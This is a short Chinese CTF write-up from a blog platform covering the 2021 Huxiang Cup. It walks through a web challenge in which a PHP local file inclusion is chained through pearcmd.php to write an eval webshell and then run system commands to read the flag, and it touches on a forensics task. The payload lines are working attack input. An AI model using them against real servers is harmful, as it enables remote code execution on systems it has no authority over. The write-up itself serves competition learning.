2021湖湘杯

最新推荐文章于 2024-06-29 22:10:23 发布
最新推荐文章于 2024-06-29 22:10:23 发布
阅读量3.1k 收藏
点赞数
分类专栏: CTF Writeup 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41636200/article/details/121786069
版权
本文回顾了2021湖湘杯网络安全竞赛,重点讨论了Web安全题目easywii,涉及PHP本地文件包含漏洞,并分享了利用Docker和PHP的知识进行攻击的方法。在Misc类别中,提到了一个取证题,通过量子密码爆破和zip压缩包的解密技术,成功获取部分flag。
摘要由CSDN通过智能技术生成

2021湖湘杯

只做了一个web,还是问了队友。misc三道题太难了。最后复盘做出来了一个。

web

easywii

队友说是p神的知识星球中的内容。后来被人打烂了。

参考链接:Docker PHP裸文件本地包含综述 - 跳跳糖 (tttang.com)

payload

?+config-create+/&name=cfile&value=/usr/local/lib/php/pearcmd.php&/<?=eval($_POST['a']);?>+/tmp/hello.php

然后访问/tmp/hello.php就可以访问shell了。

?+config-create+/&name=cfile&value=/tmp/hello.php
post a=system("cat /f*");

misc

某取证题

这个题,复盘做的时候,居然是量子密码爆破。

下载下来是个raw文件。队友说有专用软件,我就不凑热闹了。导出来一张图片,有半个flag。

最低0.47元/天 解锁文章
「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2017湖湘pwn200
12-02
【标题】"2017湖湘pwn200"是一个网络安全竞赛中的挑战项目,专注于Pwn(破解)类别。在这个挑战中,参赛者需要利用编程和安全漏洞的知识来解决问题,通常涉及缓冲区溢出、格式字符串漏洞、堆溢出等攻击技术。这个...
2017湖湘pwn100的题目
11-30
2017湖湘pwn100的题目的二进制文件和libc的二进制文件
ZIP深入明文攻击 已更新(2021湖湘某取证题&美团鱿鱼游戏)
qq_47168481的博客
12-02 7062
misc解题过程中会遇到一些明文攻击的题目,基本的明文解密就不说了,介绍一下我对深入明文攻击的理解:
[湖湘 2021]某取证题
最新发布
qq_52579508的博客
06-29 280
s: 从infile的绝对或者相对偏移量开始. + 表示相对于标 输入当前的位置 (如果不标准输入就没有意义了). – 表示从档桉末尾 (如果和 + 连用: 从标准输入当前位置) 向前数一些字符, 从那个地方开始. 如果没有 -s 选项, xxd 从当前位置开始.这里用bkcrack自带的脚本解密这个数据就可以得到原始的jpg了。导出三张图片 ,两张相同的,flag的后半段,要找前面的部分。r: 把xxd的十六进制输出内容转换回原文件的二进制内容。使用binwalk 查看 是存在很多文件的。
2021-湖湘final-Web
feng的博客
01-05 2124
2021-湖湘final-Web 前言 今年湖湘报的社企组的结果就是最后只能摆烂,然后决赛那段时间正好在复习期末,然后考完了想好好的休息一段时间,打游戏打累了再来复现一下湖湘final的题目放松放松。 vote 今年HTB的基本上算是原题了,复现的时候才发现当时做那题的时候就摆烂没管了,所以一点印象没有。。。 const path = require('path'); const express = require('express'); const pug
[湖湘 2021 final]vote
m0_70819573的博客
04-11 136
【代码】[湖湘 2021 final]vote。
2021年--湖湘--final
unexpectedthing的博客
04-28 1374
21年湖湘比赛
CTF 湖湘 决赛 2021 final.zip
12-07
【CTF 湖湘 决赛 2021 final】 CTF(Capture The Flag)是一项网络安全领域的竞技活动,参与者通过解决一系列网络安全问题来获取得分,最终以得分高低决定胜负。湖湘作为一项知名的CTF比赛,旨在促进网络安全...
第七届“湖湘”网络安全技能大赛 初赛 zip
12-07
第七届“湖湘”网络安全技能大赛 初赛
2017湖湘pwn400
12-09
2017湖湘pwn400的pwn题目,喜欢的就下载下来做一下。。
压缩包密码破解bkcrack-master
07-02
压缩包密码破解bkcrack-master
[湖湘 2021 final]Penetratable
v2ish1yan的博客
09-15 897
湖湘
[CTF复现]湖湘2021
anwen12的博客
12-14 3798
go_web 今天又是学爆guoke哥哥博客的一天 0x01 MultistageAgency 通过看源码 我们发现 这个题是三个服务 su - web -c "/code/bin/web 2>&1 >/code/logs/web.log &" su - web -c "/code/bin/proxy 2>&1 >/code/logs/proxy.log &" /code/bin/server 2>&1 >/code/log
湖湘2021-pwn-final部分复现
qq_53062301的博客
12-09 4936
第一次参加awd+,虽然成绩不是很好(大佬太多被打烂了),有很多收获,awd+赛制中可以通过攻击和防御两个手段来得分,攻击的话就是类似于正常的ctf,只不过如果成功攻击后,平台会使用官方的exp来去打全场,就是如果攻击成功,每轮(这次湖湘是20分钟一轮)都会获得攻击得分,得分会随着做题成功人数增多而减少,防御的话就是patch一下程序,然后通过ftp上传到服务器上,然后申请防御,也是防御成功就会每轮都会得分,但是防御有三种情况,一种是exp利用成功,也就是没有防御成功,还有一种清况,就是c...
幕布V1.1.9最新版漏洞集合
weixin_30677617的博客
04-22 476
0X00 前言 幕布本人最早接触是在P的知识星球里面看到P推荐的,后来下了个用着还挺好用。 之前一直都放一些零零散散的笔记,最近整理的时候,一时兴起,本着漏洞源于生活的态度,遂对幕布的安全性做了些研究。 0x01 背景 幕布是一款头脑管理工具,用更高效的方式和清晰的结构来记录笔记、管理任务、制定工作计划、头脑风暴。用最好的方式释放您的大脑! 令人觉得舒服的是,就算...
2021年第四届美团网络安全高校挑战赛决赛writeup(转)
渗透测试研究中心
12-22 275
WebHackMe开局一个文件上传,utf-16的编码绕过,然后根据提示爆破文件名 爆破最后四位 0000 - 9999, 就可以访问到了,注意是12小时。PwnbabyropDEBUG# _*_ coding:utf-8 _*_ from pwn import * import numpy as np context.log_level = 'debug' #context.terminal=...
bkcrack的安装和使用
m0_74317362的博客
11-24 1446
【利用bkcrack对zip压缩包进行明文攻击(不需要压缩包密码也能解压!攻击案例下载链接:https://wwl.lanzoub.com/ihYEN0f2sykf。github仓库:https://github.com/kimci86/bkcrack。在Release处下载(咱也不懂为什么)
Kali-bkcrack的安装和使用
a5200059的博客
05-08 595
bkcrack安装使用
续写下列内容8.2.2学校推广把湖湘地方历史传统文化宣传和修复文物的盲盒活动逐步推广到周围的学校,扩大影响力。
04-01
在推广过程中,学校利用校园内的资源,组织了一系列与湖湘地方历史传统文化相关的活动,例如文化讲座、书法比赛、古诗词朗诵等,让学生们深入了解湖湘文化的底蕴和特点,并通过实际操作感受其中的美妙。 同时,学校...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值